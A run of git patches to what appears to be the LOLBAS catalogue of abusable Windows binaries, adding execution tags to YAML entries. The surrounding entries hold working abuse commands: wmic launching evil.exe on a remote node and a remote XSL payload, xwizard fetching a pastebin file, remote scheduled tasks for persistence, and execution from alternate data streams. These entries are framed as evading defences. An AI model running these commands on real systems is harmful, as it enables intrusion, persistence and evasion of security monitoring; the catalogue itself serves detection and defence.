- Path: C:\Windows\System32\rundll32.exe - Path: C:\Windows\SysWOW64\rundll32.exe From 3346739e4bbcd676b82a79b7eeae64d4383c380d Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 16:54:20 +0200 Subject: [PATCH 050/148] Update Runexehelper.yml Tags Added Tags: Execute EXE --- yml/OSBinaries/Runexehelper.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/Runexehelper.yml b/yml/OSBinaries/Runexehelper.yml index 4437afe3..545b1c19 100644 --- a/yml/OSBinaries/Runexehelper.yml +++ b/yml/OSBinaries/Runexehelper.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\runexehelper.exe Detection: From 7047b05fe818038cb1257fa79fa36ecc82417f9f Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 16:55:13 +0200 Subject: [PATCH 051/148] Update Runonce.yml Tags Added Tags: - Execute: CMD --- yml/OSBinaries/Runonce.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/Runonce.yml b/yml/OSBinaries/Runonce.yml index b3191dca..fb024752 100644 --- a/yml/OSBinaries/Runonce.yml +++ b/yml/OSBinaries/Runonce.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: C:\Windows\System32\runonce.exe - Path: C:\Windows\SysWOW64\runonce.exe From a5191c762dddfaf2834a4397fe20c3514849ab3d Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 16:56:38 +0200 Subject: [PATCH 052/148] Update Runscripthelper.yml Tags Added Tags: Execute Powershell --- yml/OSBinaries/Runscripthelper.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/Runscripthelper.yml b/yml/OSBinaries/Runscripthelper.yml index d54807b3..2e58c2ed 100644 --- a/yml/OSBinaries/Runscripthelper.yml +++ b/yml/OSBinaries/Runscripthelper.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: Powershell Full_Path: - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe From fb19b66ab326a2c71714e6b49ff75b25f9478285 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 16:59:15 +0200 Subject: [PATCH 053/148] Update Sc.yml Tags Added Tags: Execute EXE --- yml/OSBinaries/Sc.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OSBinaries/Sc.yml b/yml/OSBinaries/Sc.yml index f8fa24a1..bd016f04 100644 --- a/yml/OSBinaries/Sc.yml +++ b/yml/OSBinaries/Sc.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: sc config binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start Description: Modifies an existing service and executes the file stored in the ADS. Usecase: Execute binary file hidden inside an alternate data stream @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\sc.exe - Path: C:\Windows\SysWOW64\sc.exe From 83a18ae34271e4dcf3147d10d1c48beb6ee60d54 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:00:51 +0200 Subject: [PATCH 054/148] Update Schtasks.yml Tags Added Tags: Execute EXE --- yml/OSBinaries/Schtasks.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OSBinaries/Schtasks.yml b/yml/OSBinaries/Schtasks.yml index f439dc8d..c37e48e0 100644 --- a/yml/OSBinaries/Schtasks.yml +++ b/yml/OSBinaries/Schtasks.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1053.005 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily Description: Create a scheduled task on a remote computer for persistence/lateral movement Usecase: Create a remote task to run daily relative to the the time of creation @@ -18,6 +20,8 @@ Commands: Privileges: Administrator MitreID: T1053.005 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\schtasks.exe - Path: c:\windows\syswow64\schtasks.exe From cb302b5d137e2db17115a68214fed70c1516516c Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:04:59 +0200 Subject: [PATCH 055/148] Update Scriptrunner.yml Tags Added Tags: - Execute: EXE - Execute: CMD - Execute: Remote --- yml/OSBinaries/Scriptrunner.yml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/yml/OSBinaries/Scriptrunner.yml b/yml/OSBinaries/Scriptrunner.yml index be2a779c..4c5b1416 100644 --- a/yml/OSBinaries/Scriptrunner.yml +++ b/yml/OSBinaries/Scriptrunner.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" Description: Executes calc.cmd from remote server Usecase: Execute binary through proxy binary from external server to evade defensive counter measures @@ -18,6 +20,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: Remote + - Execute: CMD Full_Path: - Path: C:\Windows\System32\scriptrunner.exe - Path: C:\Windows\SysWOW64\scriptrunner.exe From a8649af26a79a58c83613485b0a6eea60fbb2947 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:07:22 +0200 Subject: [PATCH 056/148] Update Setres.yml Tags Added Tags: - Execute: EXE --- yml/OSBinaries/Setres.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/Setres.yml b/yml/OSBinaries/Setres.yml index 734aba29..6797060b 100644 --- a/yml/OSBinaries/Setres.yml +++ b/yml/OSBinaries/Setres.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\setres.exe Detection: From a6de1f24c7853ed0809f76e902bfb8641a1f2dfc Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:11:02 +0200 Subject: [PATCH 057/148] Update SettingSyncHost.yml Tags Added Tags: - Execute: EXE --- yml/OSBinaries/SettingSyncHost.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OSBinaries/SettingSyncHost.yml b/yml/OSBinaries/SettingSyncHost.yml index aa20ad96..13fb36fa 100644 --- a/yml/OSBinaries/SettingSyncHost.yml +++ b/yml/OSBinaries/SettingSyncHost.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: EXE - Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32. Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\SettingSyncHost.exe - Path: C:\Windows\SysWOW64\SettingSyncHost.exe From d904027a3d5616c186f6889047638107f452e278 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:12:20 +0200 Subject: [PATCH 058/148] Update Ssh.yml Tags Added Tags: Execute EXE --- yml/OSBinaries/Ssh.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OSBinaries/Ssh.yml b/yml/OSBinaries/Ssh.yml index 4c17e630..6d651b18 100644 --- a/yml/OSBinaries/Ssh.yml +++ b/yml/OSBinaries/Ssh.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 1809, Windows Server 2019 + Tags: + - Execute: EXE - Command: ssh -o ProxyCommand=calc.exe . Description: Executes calc.exe from ssh.exe Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\OpenSSH\ssh.exe Detection: From dfec93e7deec5e6737803c2d8e50da98c4cf860c Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:13:41 +0200 Subject: [PATCH 059/148] Update Stordiag.yml Tags Added Tags: - Execute: EXE --- yml/OSBinaries/Stordiag.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OSBinaries/Stordiag.yml b/yml/OSBinaries/Stordiag.yml index a2f312ee..aa42bf6a 100644 --- a/yml/OSBinaries/Stordiag.yml +++ b/yml/OSBinaries/Stordiag.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 + Tags: + - Execute: EXE - Command: stordiag.exe Description: Once executed, Stordiag.exe will execute schtasks.exe and powershell.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it. Usecase: Possible defence evasion purposes. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\stordiag.exe - Path: c:\windows\syswow64\stordiag.exe From d6e2244165b36e809d7bd59507e738dba89098d5 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:14:26 +0200 Subject: [PATCH 060/148] Update Syncappvpublishingserver.yml --- yml/OSBinaries/Syncappvpublishingserver.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/Syncappvpublishingserver.yml b/yml/OSBinaries/Syncappvpublishingserver.yml index 085a9827..ec4e8b0a 100644 --- a/yml/OSBinaries/Syncappvpublishingserver.yml +++ b/yml/OSBinaries/Syncappvpublishingserver.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607 + Tags: + - Execute: Powershell Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.exe - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe From 7d9ce4b53aa2038193c610c28abd098975c22dbc Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:15:47 +0200 Subject: [PATCH 061/148] Update Ttdinject.yml Tags: --- yml/OSBinaries/Ttdinject.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml index 31c79c15..42f0d664 100644 --- a/yml/OSBinaries/Ttdinject.yml +++ b/yml/OSBinaries/Ttdinject.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1127 OperatingSystem: Windows 10 2004 and above, Windows 11 + Tags: + - Execute: EXE - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. Usecase: Spawn process using other binary @@ -18,6 +20,8 @@ Commands: Privileges: Administrator MitreID: T1127 OperatingSystem: Windows 10 1909 and below + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\ttdinject.exe - Path: C:\Windows\Syswow64\ttdinject.exe From 9fddf9b1b86ed6bbe1b117af3b6d42f77ceb8ca8 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:16:29 +0200 Subject: [PATCH 062/148] Update Tttracer.yml Tags Added Tags: Execute EXE --- yml/OSBinaries/Tttracer.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/Tttracer.yml b/yml/OSBinaries/Tttracer.yml index d2125bd0..c12ae91f 100644 --- a/yml/OSBinaries/Tttracer.yml +++ b/yml/OSBinaries/Tttracer.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1127 OperatingSystem: Windows 10 1809 and newer, Windows 11 + Tags: + - Execute: EXE - Command: TTTracer.exe -dumpFull -attach pid Description: Dumps process using tttracer.exe. Requires administrator privileges Usecase: Dump process by PID From e3df4d36512bea6561c5e32daf71384657649d69 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:20:57 +0200 Subject: [PATCH 063/148] Update Unregmp2.yml Tags Added Tags: - Execute: EXE --- yml/OSBinaries/Unregmp2.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/Unregmp2.yml b/yml/OSBinaries/Unregmp2.yml index d05fd20e..fabfae40 100644 --- a/yml/OSBinaries/Unregmp2.yml +++ b/yml/OSBinaries/Unregmp2.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\unregmp2.exe - Path: C:\Windows\SysWOW64\unregmp2.exe From 615dd804f2ca8684ce2e5d2bd29a963e08b80fc1 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:22:53 +0200 Subject: [PATCH 064/148] Update Vbc.yml Tags Removed Execute Tags as it is a compilation --- yml/OSBinaries/Vbc.yml | 4 ---- 1 file changed, 4 deletions(-) diff --git a/yml/OSBinaries/Vbc.yml b/yml/OSBinaries/Vbc.yml index 0511e95b..4ede8878 100644 --- a/yml/OSBinaries/Vbc.yml +++ b/yml/OSBinaries/Vbc.yml @@ -11,8 +11,6 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 7, Windows 10, Windows 11 - Tags: - - Execute: WSH - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb Description: Binary file used by .NET to compile Visual Basic code to an executable. Usecase: Compile attacker code on system. Bypass defensive counter measures. @@ -20,8 +18,6 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 7, Windows 10, Windows 11 - Tags: - - Execute: WSH Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework\v3.5\vbc.exe From 9464d668047e55f17f0db527c64399aa134375a0 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:25:54 +0200 Subject: [PATCH 065/148] Update Verclsid.yml tags Add Tags: Execute DLL --- yml/OSBinaries/Verclsid.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/Verclsid.yml b/yml/OSBinaries/Verclsid.yml index cf8fa722..27511832 100644 --- a/yml/OSBinaries/Verclsid.yml +++ b/yml/OSBinaries/Verclsid.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.012 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Windows\System32\verclsid.exe - Path: C:\Windows\SysWOW64\verclsid.exe From 266a379bc92feea49e8c089fd860d43768bbd14e Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:26:31 +0200 Subject: [PATCH 066/148] Update Wab.yml Tags Added Tags: Execute DLL --- yml/OSBinaries/Wab.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/Wab.yml b/yml/OSBinaries/Wab.yml index 6bec321a..c8e61fce 100644 --- a/yml/OSBinaries/Wab.yml +++ b/yml/OSBinaries/Wab.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Program Files\Windows Mail\wab.exe - Path: C:\Program Files (x86)\Windows Mail\wab.exe From 7a5c247dacfd8a13a4859c5079253aaabded89f6 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:27:59 +0200 Subject: [PATCH 067/148] Update Winget.yml Tags Added Tags: - Execute: Remote - Execute: EXE --- yml/OSBinaries/Winget.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSBinaries/Winget.yml b/yml/OSBinaries/Winget.yml index f5ad51eb..d6be4bc4 100644 --- a/yml/OSBinaries/Winget.yml +++ b/yml/OSBinaries/Winget.yml @@ -11,6 +11,9 @@ Commands: Privileges: Local Administrator - required to enable local manifest setting MitreID: T1105 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: Remote + - Execute: EXE - Command: winget.exe install --accept-package-agreements -s msstore [name or ID] Description: 'Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.' Usecase: Download and install software from Microsoft Store, even if Microsoft Store App is blocked From e792f14b9a5aff1ca9437fb6e37610adc2332af6 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:28:47 +0200 Subject: [PATCH 068/148] Update Wlrmdr.yml Tags Added Tags: Execute: EXE --- yml/OSBinaries/Wlrmdr.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/Wlrmdr.yml b/yml/OSBinaries/Wlrmdr.yml index 9ceccc76..10f96cce 100644 --- a/yml/OSBinaries/Wlrmdr.yml +++ b/yml/OSBinaries/Wlrmdr.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\wlrmdr.exe Code_Sample: From 6959072271e8a56222948b54985417338ad4f8cf Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:31:47 +0200 Subject: [PATCH 069/148] Update Wmic.yml Tags Added Tags: Execute: EXE Execute: Remote Execute: XSL --- yml/OSBinaries/Wmic.yml | 13 ++++++++++++- 1 file changed, 12 insertions(+), 1 deletion(-) diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml index 8c1a996e..133c4a8c 100644 --- a/yml/OSBinaries/Wmic.yml +++ b/yml/OSBinaries/Wmic.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: wmic.exe process call create calc Description: Execute calc from wmic Usecase: Execute binary from wmic to evade defensive counter measures @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" Description: Execute evil.exe on the remote system. Usecase: Execute binary on a remote system @@ -25,6 +29,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE + - Execute: Remote - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" Description: Create a volume shadow copy of NTDS.dit that can be copied. Usecase: Execute binary on remote system @@ -32,6 +39,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: XSL + - Execute: Remote - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet. Usecase: Execute script from remote system @@ -40,7 +50,8 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: WSH + - Execute: XSL + - Execute: Remote - Command: wmic.exe datafile where "Name='C:\\windows\\system32\\calc.exe'" call Copy "C:\\users\\public\\calc.exe" Description: Copy file from source to destination. Usecase: Copy file. From 9a4b3e2b8e9d9260907d5bf6ee9b4a7d72884d2e Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:32:39 +0200 Subject: [PATCH 070/148] Update WorkFolders.yml Tags Added Tags: Execute: EXE --- yml/OSBinaries/WorkFolders.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/WorkFolders.yml b/yml/OSBinaries/WorkFolders.yml index ef8045c9..6287b770 100644 --- a/yml/OSBinaries/WorkFolders.yml +++ b/yml/OSBinaries/WorkFolders.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\WorkFolders.exe Detection: From 9c6e7222cec76ded28ece60552dbaf42e27ff6c4 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:34:23 +0200 Subject: [PATCH 071/148] Update Xwizard.yml Tags Added Tags: Execute: DLL --- yml/OSBinaries/Xwizard.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index 549b6096..87076e3b 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC} Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds. Usecase: Run a com object created in registry to evade defensive counter measures @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache. Usecase: Download file from Internet From df306a4e0e40ca159690fcd1913e07cfa7aba26a Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:35:25 +0200 Subject: [PATCH 072/148] Update msedge_proxy.yml Tags Added Tags: Execute: CMD --- yml/OSBinaries/msedge_proxy.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index 7bfe43d6..8da75b12 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -27,6 +27,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml Acknowledgement: From dd7be51f56abe5e2552a87e9cd00949c478b4c76 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:36:40 +0200 Subject: [PATCH 073/148] Update msedgewebview2.yml Tags Added Tags: Execute: EXE --- yml/OSBinaries/msedgewebview2.yml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/yml/OSBinaries/msedgewebview2.yml b/yml/OSBinaries/msedgewebview2.yml index 83f76cda..c89260d1 100644 --- a/yml/OSBinaries/msedgewebview2.yml +++ b/yml/OSBinaries/msedgewebview2.yml @@ -11,6 +11,8 @@ Commands: Privileges: Low privileges MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: msedgewebview2.exe --utility-cmd-prefix="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -32,6 +38,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe Detection: From 6375a4a3389f34399aa64da80f878d92f6f4e614 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:37:02 +0200 Subject: [PATCH 074/148] Update wt.yml --- yml/OSBinaries/wt.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/wt.yml b/yml/OSBinaries/wt.yml index 7b54dacd..13b34e44 100644 --- a/yml/OSBinaries/wt.yml +++ b/yml/OSBinaries/wt.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_\wt.exe Detection: From 75d04eaf722ee65d0964a22c56185dd7a3a85ae2 Mon Sep 17 00:00:00 2001 From: Hegusung Date: Sun, 13 Oct 2024 17:57:36 +0200 Subject: [PATCH 075/148] Correct identation --- yml/OSBinaries/Presentationhost.yml | 2 +- yml/OSBinaries/Provlaunch.yml | 2 +- yml/OSBinaries/Regsvr32.yml | 12 ++++++------ yml/OSBinaries/Rundll32.yml | 8 ++++---- yml/OSBinaries/Runexehelper.yml | 2 +- yml/OSBinaries/Runonce.yml | 2 +- yml/OSBinaries/Runscripthelper.yml | 2 +- yml/OSBinaries/Sc.yml | 4 ++-- yml/OSBinaries/Schtasks.yml | 4 ++-- yml/OSBinaries/Scriptrunner.yml | 6 +++--- yml/OSBinaries/Setres.yml | 2 +- yml/OSBinaries/SettingSyncHost.yml | 4 ++-- yml/OSBinaries/Ssh.yml | 4 ++-- yml/OSBinaries/Stordiag.yml | 4 ++-- yml/OSBinaries/Syncappvpublishingserver.yml | 2 +- yml/OSBinaries/Ttdinject.yml | 4 ++-- yml/OSBinaries/Tttracer.yml | 2 +- yml/OSBinaries/Unregmp2.yml | 2 +- yml/OSBinaries/Verclsid.yml | 2 +- yml/OSBinaries/Wab.yml | 2 +- yml/OSBinaries/Winget.yml | 4 ++-- yml/OSBinaries/Wlrmdr.yml | 2 +- yml/OSBinaries/Wmic.yml | 12 ++++++------ yml/OSBinaries/WorkFolders.yml | 2 +- yml/OSBinaries/Xwizard.yml | 4 ++-- yml/OSBinaries/msedge_proxy.yml | 2 +- yml/OSBinaries/msedgewebview2.yml | 8 ++++---- yml/OSBinaries/wt.yml | 2 +- 28 files changed, 54 insertions(+), 54 deletions(-) diff --git a/yml/OSBinaries/Presentationhost.yml b/yml/OSBinaries/Presentationhost.yml index 